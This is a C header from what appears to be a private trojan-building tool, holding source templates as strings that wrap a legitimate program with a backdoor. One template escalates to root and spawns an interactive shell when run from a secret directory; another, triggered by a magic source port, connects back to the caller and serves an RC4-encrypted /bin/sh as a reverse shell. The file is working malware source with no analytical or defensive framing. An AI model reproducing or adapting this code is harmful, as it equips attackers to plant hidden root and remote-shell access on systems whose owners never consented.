/* $Id: guile.h,v 1.1 2000/12/18 23:16:59 bind Exp $ */

#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <utime.h>

#define VER "0.1 private"

#define REMOTE	(1)
#define LOCAL	(1 << 1)

#define CSOURCE	(1)

char *program_header =
"#include <unistd.h>\n"
"#include <stdio.h>\n"
"#include <sys/types.h>\n"
"#include <sys/stat.h>\n\n";

char *t_main =
"\nint main(int argc, char **argv, char **envp)\n"
"{\n"
"  FILE* f;\n"
"  int i;\n"
"  struct stat statbuf;\n\n"
"  t_magic(argv, envp);\n\n"
"  if(stat(EXE, &statbuf) == -1) {\n"
"    if(!(f = fopen(EXE, \"w\"))) {\n"
"      perror(\"open exec file\");\n"
"      exit(-1);\n"
"    }\n\n"
"    for(i = 0; i < CODE_SIZE; i++)\n"
"      fprintf(f,\"%%c\", original_code[i]);\n\n"
"    fclose(f);\n"
"    chmod(EXE, S_IRUSR | S_IWUSR | S_IXUSR);\n"
"  }\n\n"
"  if(execve(EXE, argv, envp) == -1)\n"
"    perror(\"execute program\");\n\n"
"  return(0);\n"
"}\n";

char *t_local_magic =
"\nint t_magic(char **argc, char **envp)\n"
"{\n"
"  char dir[256], *cwd;\n"
"  cwd = dir;\n"
"  getcwd(cwd, 256);\n"
"  if(strstr(cwd, MAGIC_DIR) != NULL) {\n"
"    setuid(0); setgid(0);\n"
"    execl(\"/bin/sh\", \"/bin/sh\", \"-i\", NULL);\n"
"  exit(0);\n"
"  }\n"
"  return(0);\n"
"}\n";

char *t_remote_magic =
"#include <sys/ioctl.h>\n"
"#include <netinet/in_systm.h>\n"
"#include <netinet/in.h>\n"
"#include <sys/socket.h>\n\n"

"#include \"rc4.h\"\n"

"\nint net_init(unsigned long host)\n"
"{\n"
"  int sockfd, res;\n"
"  struct sockaddr_in l_sin;\n"
"  memset(&l_sin, 0, sizeof(l_sin));\n"
"  sockfd = socket(AF_INET, SOCK_STREAM, 0);\n"
"  if(sockfd <  0)\n"
"    return(3);\n"
"  l_sin.sin_family = AF_INET;\n"
"  l_sin.sin_port = ntohs(atoi(MAGIC_LISTEN));\n"
"  l_sin.sin_addr.s_addr = host;\n"
"  res = connect(sockfd, (struct sockaddr *)&l_sin, sizeof(l_sin));\n"
"   if(res < 0)\n"
"     return(1);\n"
"  return sockfd;\n"
"}\n"

"\nint net_connect(int sd, char *passwd)\n"
"{\n"
"  int size, num = 0, pid, status, pfds[2], pfds2[2];\n"
"  char idata[1000], odata[1000];\n"
"  unsigned long nb = 1;\n"
"    if(pipe(pfds) < 0)\n"
"      return(-1);\n"
"    if(pipe(pfds2) < 0)\n"
"      return(-1);\n"
"    ioctl(pfds2[0], FIONBIO, &nb);\n"
"    ioctl(sd, FIONBIO, &nb);\n"
"    if((pid = fork()) == 0) {\n"
"      close(0);\n"
"      close(1);\n"
"      dup2(pfds[0], 0);\n"
"      dup2(pfds2[1], 1);\n"
"      dup2(pfds2[1], 2);\n"
"      status = execl(\"/bin/sh\", \"/bin/sh\", NULL);\n"
"      exit(-1);\n"
"      exit(-1);\n"
"    }\n"
"    for(;;) {\n"
"      memset(idata, sizeof(idata), 0);\n"
"      memset(odata, sizeof(odata), 0);\n"
"      num = recv(sd, idata, sizeof(idata), 0);\n"
"      if(num == 0) break;\n"
"      if(num > 0) {\n"
"        if(rc4crypt(passwd, strlen(passwd), idata, num))\n"
"          return(-1);\n"
"      if(strstr(idata, \"exit\") != NULL) {\n"
"        write(pfds[1], idata, num);\n"
"        break;\n"
"      }\n"
"        write(pfds[1], idata, num);\n"
"      }\n"
"      num = read(pfds2[0], odata, sizeof(odata));\n"
"      if(rc4crypt(passwd, strlen(passwd), odata, num))\n"
"        return(-1);\n"
"      send(sd, odata, num, 0);\n"
"   }\n"
"  close(sd);\n"
"}\n"

"\nint t_magic(char **argc, char **envp)\n"
"{\n"
"  int sd = 0, size, port;\n"
"  struct sockaddr_in sin;\n"
"  struct in_addr host;\n"
"  size = sizeof(sin);\n"
"  if(!getpeername(0, (struct sockaddr *)&sin, &size)) {\n"
"    host = sin.sin_addr;\n"
"    port = ntohs(sin.sin_port);\n"
"    if(port == atoi(MAGIC_PORT)) {\n"
"    sleep(5);\n"
"    sd = net_init(host.s_addr);\n"
"    net_connect(sd, MAGIC_PASSWD);\n"
"    close(sd);\n"
"    exit(0);\n"
"   }\n"
"  }\n"
"}\n";
